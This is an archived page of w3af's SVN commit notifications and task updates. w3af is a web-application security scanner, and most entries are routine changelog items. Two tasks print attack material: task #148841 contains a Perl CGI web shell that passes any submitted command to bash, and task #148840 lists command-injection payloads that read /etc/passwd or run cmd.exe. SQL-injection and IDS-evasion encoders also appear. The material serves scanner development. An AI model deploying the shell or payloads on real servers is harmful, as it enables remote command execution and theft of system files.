w3af-svn-notify Mailing List for w3af (Page 235)
Status: Beta
Brought to you by:
andresriancho
Menu
▾
▴
w3af-svn-notify — This mailing list has a copy of the SVN Commit logs and each modified file
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
(235) |
Mar
(336) |
Apr
(280) |
May
(278) |
Jun
(159) |
Jul
(270) |
Aug
(240) |
Sep
(121) |
Oct
(110) |
Nov
(199) |
Dec
(228) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(251) |
Feb
(206) |
Mar
(115) |
Apr
(45) |
May
(27) |
Jun
(67) |
Jul
(49) |
Aug
(38) |
Sep
(10) |
Oct
(131) |
Nov
(89) |
Dec
(38) |
| 2010 |
Jan
(85) |
Feb
(71) |
Mar
(45) |
Apr
(23) |
May
(12) |
Jun
|
Jul
(11) |
Aug
(7) |
Sep
(81) |
Oct
(79) |
Nov
(165) |
Dec
(62) |
| 2011 |
Jan
(134) |
Feb
(73) |
Mar
(34) |
Apr
(63) |
May
(147) |
Jun
(43) |
Jul
(21) |
Aug
(26) |
Sep
(43) |
Oct
(34) |
Nov
(44) |
Dec
(112) |
| 2012 |
Jan
(47) |
Feb
(44) |
Mar
(72) |
Apr
(209) |
May
(54) |
Jun
(279) |
Jul
(151) |
Aug
(332) |
Sep
(39) |
Oct
(268) |
Nov
(116) |
Dec
(368) |
| 2013 |
Jan
(73) |
Feb
|
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: <and...@us...> - 2008-06-03 04:13:12
|
Revision: 1249
http://w3af.svn.sourceforge.net/w3af/?rev=1249&view=rev
Author: andresriancho
Date: 2008-06-02 21:13:06 -0700 (Mon, 02 Jun 2008)
Log Message:
-----------
Added an error page signature.
Modified Paths:
--------------
trunk/plugins/grep/errorPages.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-06-02 13:15:40
|
Revision: 1248
http://w3af.svn.sourceforge.net/w3af/?rev=1248&view=rev
Author: andresriancho
Date: 2008-06-02 06:15:38 -0700 (Mon, 02 Jun 2008)
Log Message:
-----------
Nicer message when entering an invalid URL.
Modified Paths:
--------------
trunk/core/controllers/targetSettings.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <uli...@us...> - 2008-06-02 04:34:18
|
Revision: 1247
http://w3af.svn.sourceforge.net/w3af/?rev=1247&view=rev
Author: ulises2k
Date: 2008-06-01 21:34:15 -0700 (Sun, 01 Jun 2008)
Log Message:
-----------
w3af_update.exe
Source Code w3af_update.nsi
Alternative at w3af_update.bat
Only for Windows Vista
Added Paths:
-----------
extras/windows_installer/w3af_update.exe
extras/windows_installer/w3af_update.nsi
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <uli...@us...> - 2008-06-02 04:32:34
|
Revision: 1246
http://w3af.svn.sourceforge.net/w3af/?rev=1246&view=rev
Author: ulises2k
Date: 2008-06-01 21:32:32 -0700 (Sun, 01 Jun 2008)
Log Message:
-----------
Manifest.
w3af update
Added Paths:
-----------
extras/windows_installer/w3af_update.bat.manifest
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <uli...@us...> - 2008-06-02 04:31:48
|
Revision: 1245
http://w3af.svn.sourceforge.net/w3af/?rev=1245&view=rev
Author: ulises2k
Date: 2008-06-01 21:31:47 -0700 (Sun, 01 Jun 2008)
Log Message:
-----------
splash Windows Installer
Added Paths:
-----------
extras/windows_installer/splash-without-version.bmp
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <uli...@us...> - 2008-06-02 04:28:49
|
Revision: 1244
http://w3af.svn.sourceforge.net/w3af/?rev=1244&view=rev
Author: ulises2k
Date: 2008-06-01 21:28:48 -0700 (Sun, 01 Jun 2008)
Log Message:
-----------
Fixed #1968431.
Final Version.
Modified Paths:
--------------
extras/windows_installer/w3af-setup.nsi
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-06-02 02:34:23
|
Revision: 1243
http://w3af.svn.sourceforge.net/w3af/?rev=1243&view=rev
Author: andresriancho
Date: 2008-06-01 19:34:10 -0700 (Sun, 01 Jun 2008)
Log Message:
-----------
Some minimal aestetic changes to the proxy daemon, and a new certificate for it.
Modified Paths:
--------------
trunk/core/controllers/daemons/mitm.crt
trunk/core/controllers/daemons/proxy.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-06-02 02:32:34
|
Revision: 1242
http://w3af.svn.sourceforge.net/w3af/?rev=1242&view=rev
Author: andresriancho
Date: 2008-06-01 19:32:33 -0700 (Sun, 01 Jun 2008)
Log Message:
-----------
Added a try/except to handle the case where pyPdf is only installed in the system and not in extlib directory.
Modified Paths:
--------------
trunk/core/data/parsers/pdfParser.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-06-02 02:31:46
|
Revision: 1241
http://w3af.svn.sourceforge.net/w3af/?rev=1241&view=rev
Author: andresriancho
Date: 2008-06-01 19:31:45 -0700 (Sun, 01 Jun 2008)
Log Message:
-----------
More documentation and added a #FIXME for some logic in this plugin.
Modified Paths:
--------------
trunk/plugins/discovery/findvhost.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: SourceForge.net <no...@so...> - 2008-06-02 02:30:45
|
Task #148674 has been updated. Project: w3af Subproject: gtkUi - OWASP SoC 2008 Summary: encode decode window Complete: 100% Status: Open Authority : andresriancho Assigned to: facundobatista Description: Sorry for adding more things to a window that was already finished, but I found some other encodings that we should provide to the users. Please download wfuzz from http://www.edge-security.com/wfuzz.php and see the file encoders.py . Some of them are already implemented, but some aren't. Follow-Ups: ------------------------------------------------------- Date: 2008-06-01 23:30 By: andresriancho Comment: I'm feeling free to reopen this task ;) Please do it with a combo-box. Thanks! ------------------------------------------------------- Date: 2008-05-31 20:02 By: facundobatista Comment: A note regarding the UTF-8 Encoding... the paper has UTF-8 wrong. For example, it claims that "%C1%81" is the character "A", but that is not valid UTF-8 (see, for example, the RFC 3629 (http://tools.ietf.org/html/rfc3629) that claims that in a UTF-8 the octet values C0, C1, F5 to FF never appear). ------------------------------------------------------- Date: 2008-05-31 20:00 By: facundobatista Comment: Done! Feel free to reopen this task if you want to transform all the buttons in a combobox (right now is pretty ugly). ------------------------------------------------------- Date: 2008-05-22 16:37 By: andresriancho Comment: Two more (encoder only): - encoder_mysqlchar - encoder_mssqlchar These two encoders are useful for SQL injections, and return the encoded string surrounded by a CHAR() function: MYSQL ===== def encode(self,string): new="CHAR(" for x in string: val=str(ord(x)) new+=str(val)+"," new=new.strip(",") new+=")" return new MSSQL ===== def encode(self,string): new="" for x in string: val=str(ord(x)) new+="CHAR("+str(val)+")+" new=new.strip("+") return new ------------------------------------------------------- Date: 2008-05-22 16:29 By: andresriancho Comment: The encoders to add are: - Double urlencode (apply urlencode twice) [must have decode] - Random upper (change random chars of the string to upper case) - Random lower (change random chars of the string to lower case) - Hex Encoding as specified in the pdf linked here [0] [must have decode] - Double Percent Hex Encoding as specified in the pdf linked here [0] - Double Nibble Hex Encoding as specified in the pdf linked here [0] - First Nibble Hex Encoding as specified in the pdf linked here [0] - Second Nibble Hex Encoding as specified in the pdf linked here [0] - UTF-8 Encoding as specified in the pdf linked here [0] - UTF-8 Bare Byte Encoding as specified in the pdf linked here [0] - Microsoft %U Encoding as specified in the pdf linked here [0] A lot of these encoders are already coded in the wfuzz project that I specified before. [0] docs.idsresearch.org/http_ids_evasions.pdf ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=148674&group_id=170274&group_project_id=56282 |
|
From: <and...@us...> - 2008-06-01 19:01:20
|
Revision: 1240
http://w3af.svn.sourceforge.net/w3af/?rev=1240&view=rev
Author: andresriancho
Date: 2008-06-01 12:01:17 -0700 (Sun, 01 Jun 2008)
Log Message:
-----------
Adding a manpage that will be used with debian.
Added Paths:
-----------
extras/manpage/
extras/manpage/w3af.1
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: SourceForge.net <no...@so...> - 2008-05-31 23:02:29
|
Task #148674 has been updated. Project: w3af Subproject: gtkUi - OWASP SoC 2008 Summary: encode decode window Complete: 100% Status: Closed Authority : andresriancho Assigned to: facundobatista Description: Sorry for adding more things to a window that was already finished, but I found some other encodings that we should provide to the users. Please download wfuzz from http://www.edge-security.com/wfuzz.php and see the file encoders.py . Some of them are already implemented, but some aren't. Follow-Ups: ------------------------------------------------------- Date: 2008-05-31 20:02 By: facundobatista Comment: A note regarding the UTF-8 Encoding... the paper has UTF-8 wrong. For example, it claims that "%C1%81" is the character "A", but that is not valid UTF-8 (see, for example, the RFC 3629 (http://tools.ietf.org/html/rfc3629) that claims that in a UTF-8 the octet values C0, C1, F5 to FF never appear). ------------------------------------------------------- Date: 2008-05-31 20:00 By: facundobatista Comment: Done! Feel free to reopen this task if you want to transform all the buttons in a combobox (right now is pretty ugly). ------------------------------------------------------- Date: 2008-05-22 16:37 By: andresriancho Comment: Two more (encoder only): - encoder_mysqlchar - encoder_mssqlchar These two encoders are useful for SQL injections, and return the encoded string surrounded by a CHAR() function: MYSQL ===== def encode(self,string): new="CHAR(" for x in string: val=str(ord(x)) new+=str(val)+"," new=new.strip(",") new+=")" return new MSSQL ===== def encode(self,string): new="" for x in string: val=str(ord(x)) new+="CHAR("+str(val)+")+" new=new.strip("+") return new ------------------------------------------------------- Date: 2008-05-22 16:29 By: andresriancho Comment: The encoders to add are: - Double urlencode (apply urlencode twice) [must have decode] - Random upper (change random chars of the string to upper case) - Random lower (change random chars of the string to lower case) - Hex Encoding as specified in the pdf linked here [0] [must have decode] - Double Percent Hex Encoding as specified in the pdf linked here [0] - Double Nibble Hex Encoding as specified in the pdf linked here [0] - First Nibble Hex Encoding as specified in the pdf linked here [0] - Second Nibble Hex Encoding as specified in the pdf linked here [0] - UTF-8 Encoding as specified in the pdf linked here [0] - UTF-8 Bare Byte Encoding as specified in the pdf linked here [0] - Microsoft %U Encoding as specified in the pdf linked here [0] A lot of these encoders are already coded in the wfuzz project that I specified before. [0] docs.idsresearch.org/http_ids_evasions.pdf ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=148674&group_id=170274&group_project_id=56282 |
|
From: SourceForge.net <no...@so...> - 2008-05-31 23:00:57
|
Task #148674 has been updated. Project: w3af Subproject: gtkUi - OWASP SoC 2008 Summary: encode decode window Complete: 100% Status: Closed Authority : andresriancho Assigned to: facundobatista Description: Sorry for adding more things to a window that was already finished, but I found some other encodings that we should provide to the users. Please download wfuzz from http://www.edge-security.com/wfuzz.php and see the file encoders.py . Some of them are already implemented, but some aren't. Follow-Ups: ------------------------------------------------------- Date: 2008-05-31 20:00 By: facundobatista Comment: Done! Feel free to reopen this task if you want to transform all the buttons in a combobox (right now is pretty ugly). ------------------------------------------------------- Date: 2008-05-22 16:37 By: andresriancho Comment: Two more (encoder only): - encoder_mysqlchar - encoder_mssqlchar These two encoders are useful for SQL injections, and return the encoded string surrounded by a CHAR() function: MYSQL ===== def encode(self,string): new="CHAR(" for x in string: val=str(ord(x)) new+=str(val)+"," new=new.strip(",") new+=")" return new MSSQL ===== def encode(self,string): new="" for x in string: val=str(ord(x)) new+="CHAR("+str(val)+")+" new=new.strip("+") return new ------------------------------------------------------- Date: 2008-05-22 16:29 By: andresriancho Comment: The encoders to add are: - Double urlencode (apply urlencode twice) [must have decode] - Random upper (change random chars of the string to upper case) - Random lower (change random chars of the string to lower case) - Hex Encoding as specified in the pdf linked here [0] [must have decode] - Double Percent Hex Encoding as specified in the pdf linked here [0] - Double Nibble Hex Encoding as specified in the pdf linked here [0] - First Nibble Hex Encoding as specified in the pdf linked here [0] - Second Nibble Hex Encoding as specified in the pdf linked here [0] - UTF-8 Encoding as specified in the pdf linked here [0] - UTF-8 Bare Byte Encoding as specified in the pdf linked here [0] - Microsoft %U Encoding as specified in the pdf linked here [0] A lot of these encoders are already coded in the wfuzz project that I specified before. [0] docs.idsresearch.org/http_ids_evasions.pdf ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=148674&group_id=170274&group_project_id=56282 |
|
From: <fac...@us...> - 2008-05-31 23:00:54
|
Revision: 1239
http://w3af.svn.sourceforge.net/w3af/?rev=1239&view=rev
Author: facundobatista
Date: 2008-05-31 16:00:51 -0700 (Sat, 31 May 2008)
Log Message:
-----------
Done all the encodings and decodings described in
task #148674.
Modified Paths:
--------------
trunk/core/ui/gtkUi/encdec.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <ab...@us...> - 2008-05-31 20:20:28
|
Revision: 1238
http://w3af.svn.sourceforge.net/w3af/?rev=1238&view=rev
Author: aberezh
Date: 2008-05-31 13:20:26 -0700 (Sat, 31 May 2008)
Log Message:
-----------
Proxy: attempt to make CONNECT method working. Looks good.
Modified Paths:
--------------
trunk/core/controllers/daemons/proxy.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <fac...@us...> - 2008-05-31 15:57:03
|
Revision: 1237
http://w3af.svn.sourceforge.net/w3af/?rev=1237&view=rev
Author: facundobatista
Date: 2008-05-31 08:56:59 -0700 (Sat, 31 May 2008)
Log Message:
-----------
Restructured the module to be able to test each
function.
Modified Paths:
--------------
trunk/core/ui/gtkUi/encdec.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-05-30 18:55:43
|
Revision: 1236
http://w3af.svn.sourceforge.net/w3af/?rev=1236&view=rev
Author: andresriancho
Date: 2008-05-30 11:55:42 -0700 (Fri, 30 May 2008)
Log Message:
-----------
Fixed bug of false positive in strangeParameters where the parameter was something like: "hola mundo que tal" (separated by spaces).
Modified Paths:
--------------
trunk/plugins/grep/strangeParameters.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-05-30 18:23:12
|
Revision: 1235
http://w3af.svn.sourceforge.net/w3af/?rev=1235&view=rev
Author: andresriancho
Date: 2008-05-30 11:23:07 -0700 (Fri, 30 May 2008)
Log Message:
-----------
Fixed bug #1979304, the plugin returned None instead of a list.
Modified Paths:
--------------
trunk/plugins/discovery/dnsWildcard.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-05-30 10:30:20
|
Revision: 1234
http://w3af.svn.sourceforge.net/w3af/?rev=1234&view=rev
Author: andresriancho
Date: 2008-05-30 03:30:18 -0700 (Fri, 30 May 2008)
Log Message:
-----------
Fixing bug.
Modified Paths:
--------------
trunk/plugins/discovery/fingerGoogle.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-05-30 04:20:52
|
Revision: 1233
http://w3af.svn.sourceforge.net/w3af/?rev=1233&view=rev
Author: andresriancho
Date: 2008-05-29 21:20:51 -0700 (Thu, 29 May 2008)
Log Message:
-----------
Fixed a bug in the handling of google results.
Modified Paths:
--------------
trunk/plugins/discovery/fingerGoogle.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <fac...@us...> - 2008-05-30 04:14:30
|
Revision: 1232
http://w3af.svn.sourceforge.net/w3af/?rev=1232&view=rev
Author: facundobatista
Date: 2008-05-29 21:14:28 -0700 (Thu, 29 May 2008)
Log Message:
-----------
Indicate progress of impacts.
Modified Paths:
--------------
trunk/core/ui/gtkUi/craftedRequests.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <fac...@us...> - 2008-05-30 00:35:43
|
Revision: 1231
http://w3af.svn.sourceforge.net/w3af/?rev=1231&view=rev
Author: facundobatista
Date: 2008-05-29 17:35:41 -0700 (Thu, 29 May 2008)
Log Message:
-----------
Limited the height of the debug line to the next level.
Modified Paths:
--------------
trunk/core/ui/gtkUi/logtab.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: SourceForge.net <no...@so...> - 2008-05-29 23:25:35
|
Task #148841 has been updated.
Project: w3af
Subproject: Plugin TODO v1.00
Summary: add perl cmd shell
Complete: 0%
Status: Open
Authority : andresriancho
Assigned to: nobody
Description: #!/usr/bin/perl
require "cgi-lib.pl";
print &PrintHeader;
print "<FORM ACTION=perl_shell.cgi METHOD=GET>\n";
print "<INPUT NAME=cmd TYPE=TEXT>\n";
print "<INPUT TYPE=SUBMIT VALUE=Run>\n";
print "</FORM>\n";
&ReadParse(*in);
if($in{'cmd'} ne "") {
print "<PRE>\n$in{'cmd'}\n\n";
print `/bin/bash -c "$in{'cmd'}"`;
print "</PRE>\n";
}
-------------------------------------------------------
For more info, visit:
http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=148841&group_id=170274&group_project_id=50603
|
|
From: SourceForge.net <no...@so...> - 2008-05-29 23:25:09
|
Task #148840 has been updated. Project: w3af Subproject: Plugin TODO v1.00 Summary: audit.eval Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: I can't believe I forgot this! =) OS Commands ASP 1.https://localhost/dash/admin/logview.asp Aquà el sitio nos nuestra un cuadro de dialogo donde debemos ingresar el nombre del log. Attacks: laslog5 && dir c:\ OS Commands PHP 2.https://localhost/search.php?storedsearch=\$mysearch%3dwahh Attacks: https://localhost/search.php?storedsearch=\$mysearch%3dwahh;%20echo%20file_get_contests(â/etc/passwd) https://localhost/search.php?storedsearch=\$mysearch%3dwahh;%20system(âcat /etc/passwdâ) OS Commands Dynamic Exe ASP 3.https://localhost/search.asp?storedsearch=mysearch%3dwahh:responde.write%20111111 Attacks: https://localhost/search.asp?storedsearch=mysearch%3dwahh:+Dim +oScript:+Set+oScript+=Server.CreateObject(âWSCRIPT.SHELLâ):+CALL+oSCRIPT.Run+(âcmd.exe+/c+dir+>+c:\inetpub\wwwroot\dir.txtâ,0,True) ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=148840&group_id=170274&group_project_id=50603 |
|
From: <and...@us...> - 2008-05-29 21:00:38
|
Revision: 1230
http://w3af.svn.sourceforge.net/w3af/?rev=1230&view=rev
Author: andresriancho
Date: 2008-05-29 14:00:31 -0700 (Thu, 29 May 2008)
Log Message:
-----------
Added a new plugin that detects the lack of ASP.NET event validation.
Added Paths:
-----------
trunk/plugins/grep/dotNetEventValidation.py
trunk/scripts/script-dotNetEventValidation.w3af
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
